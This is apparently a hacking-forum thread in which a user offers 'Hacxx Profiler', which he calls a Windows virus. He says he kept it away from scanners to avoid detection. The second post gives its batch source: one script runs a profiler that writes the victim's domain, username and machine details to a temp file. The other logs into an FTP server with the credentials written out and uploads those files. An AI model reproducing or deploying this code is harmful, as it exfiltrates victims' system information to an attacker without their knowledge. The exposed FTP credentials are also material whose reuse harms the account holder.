Reversing Center
Дистанционный центр по исследованию защитного ПО.

Hacxx Profiler - Computer profile virus

hacxx

Участник
Сообщения
335
Реакции
5
Hacxx Profiler is a windows virus that i have developed that creates a text file with the profile for the machine and upload by ftp to a protected server.

The user can view and download all the logs created with this program by visiting the server.
Код:
http://uploaded.net
Username: 16834486
Password: i3e6by88

Download:

Virus Scan:
This file was not send to avoid further detection

Note:
  • PM Me if you want the source code.
  • The file only runs if extracted and executed outside the zip file on a Windows machine.
 

hacxx

Участник
Сообщения
335
Реакции
5
Hacxx Profiler [Source code]

ftp.bat
Код:
@ftp -i -s:"%~f0"&GOTO:EOF
open ftp.uploaded.net
16834486
i3e6by88
binary
put "c:\windows\temp\*.txt"
disconnect
bye

main.bat
Код:
@ECHO OFF
REM  QBFC Project Options Begin
REM  HasVersionInfo: Yes
REM  Companyname: Microtech, LLC
REM  Productname: Hacxx Profiler
REM  Filedescription: 
REM  Copyrights: 
REM  Trademarks: 
REM  Originalname: 
REM  Comments: 
REM  Productversion:  1. 0. 0. 0
REM  Fileversion:  1. 0. 0. 0
REM  Internalname: 
REM  Appicon: Profile.ico
REM  AdministratorManifest: No
REM  Embeddedfile: PTProfiler.exe
REM  Embeddedfile: ftp.bat
REM  QBFC Project Options End
@ECHO ON
%MYFILES%\PTProfiler.exe /save c:\windows\temp\%userdomain%-%username%-profile.txt
%MYFILES%\ftp.bat

Profile.ico
PTProfiler.exe

Download:

 
telderi.ru
Сверху